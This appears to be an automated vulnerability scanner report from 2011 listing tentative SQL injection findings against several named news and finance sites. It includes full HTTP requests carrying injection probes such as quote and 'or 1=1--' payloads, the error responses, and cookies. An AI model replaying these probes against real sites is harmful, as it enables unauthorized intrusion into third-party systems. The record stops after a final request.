HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 18:06:26 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-FRAME-OPTIONS: DENY X-Content-Type-Options: nosniff Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 21441
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <meta http-e ...[SNIP]... <script type="text/javascript"> if(typeof(top.LogErr)!="undefined")window.onerror=top.LogErr; </script> ...[SNIP]...
Request 2
GET /money.search HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 302 Redirect Connection: close Date: Sun, 30 Jan 2011 18:06:26 GMT Server: Microsoft-IIS/6.0 Location: http://moneycentral.msn.com/common/toobusy.htm
1.73. http://redacted/money.search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://moneycentral.msn.com
Path:
/money.search
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /money.search?1'=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:06:23 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /money.search?1''=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 302 Redirect Connection: close Date: Sun, 30 Jan 2011 18:06:24 GMT Server: Microsoft-IIS/6.0 Location: http://moneycentral.msn.com/common/toobusy.htm
The c parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the c parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /a.z?s=73&p=9&c=4'&pid=88&yr=2011 HTTP/1.1 Host: recruiting.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:52:01 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb1 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 X-Streamed: from 192.168.20.181 in 308 ms Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 00:02:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 212531
<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null,2011,null,null,null,null,null,88,null'.--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict ...[SNIP]...
The pid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the pid parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /a.z?s=73&p=9&c=4&pid=88'&yr=2011 HTTP/1.1 Host: recruiting.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Connection: close Date: Sat, 29 Jan 2011 23:52:12 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb2 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 X-Streamed: from 192.168.20.181 in 72 ms Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 00:02:12 GMT Content-Type: text/html; charset=utf-8 Content-Length: 11806
<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null'.--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1 ...[SNIP]...
The yr parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the yr parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /a.z?s=73&p=9&c=4&pid=88&yr=2011' HTTP/1.1 Host: recruiting.scout.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 29 Jan 2011 23:52:22 GMT Server: Microsoft-IIS/6.0 Server: Scoutweb4 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-HTTPModule: Scout Media Excalibur v.6.24.1.5335 X-Streamed: from 192.168.20.181 in 100 ms Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/ Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/ Cache-Control: public, s-maxage=600 Expires: Sun, 30 Jan 2011 00:02:22 GMT Content-Type: text/html; charset=utf-8 Content-Length: 16943
<!-- An exception occurred. Described as: Unclosed quotation mark after the character string ',null,null,null,null,null,88,null'.--><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...
1.77. http://technolog.msnbc.redacted/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://technolog.msnbc.redacted
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 38908709%20or%201%3d1--%20 and 38908709%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?138908709%20or%201%3d1--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:37:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 143999
GET /?138908709%20or%201%3d2--%20=1 HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 02:37:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 143987
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_news/2010%20and%201%3d1--%20/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:35:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39901
GET /_news/2010%20and%201%3d2--%20/08/16/4904611-north-korea-welcome-to-twitter HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:35:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 17360674%20or%201%3d1--%20 and 17360674%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_news/2010/0817360674%20or%201%3d1--%20/16/4904611-north-korea-welcome-to-twitter HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:35:52 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39897
GET /_news/2010/0817360674%20or%201%3d2--%20/16/4904611-north-korea-welcome-to-twitter HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:35:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39909
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_news/2010/08/16'%20and%201%3d1--%20/4904611-north-korea-welcome-to-twitter HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:36:24 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39907
GET /_news/2010/08/16'%20and%201%3d2--%20/4904611-north-korea-welcome-to-twitter HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 02:36:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39897
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_news/2010%20and%201%3d1--%20/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:25:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
GET /_news/2010%20and%201%3d2--%20/08/30/5002284-thinkpad-maker-lenovo-creating-ebox-game-console HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:25:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39899
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_news/2011/01/24'%20and%201%3d1--%20/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:31:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
GET /_news/2011/01/24'%20and%201%3d2--%20/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:31:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39899
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 87273916%20or%201%3d1--%20 and 87273916%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_news/201187273916%20or%201%3d1--%20/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:28:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39901
GET /_news/201187273916%20or%201%3d2--%20/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Content-Type: text/html Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:28:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39911
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13719482'%20or%201%3d1--%20 and 13719482'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_news/201113719482'%20or%201%3d1--%20/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1 Host: technolog.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
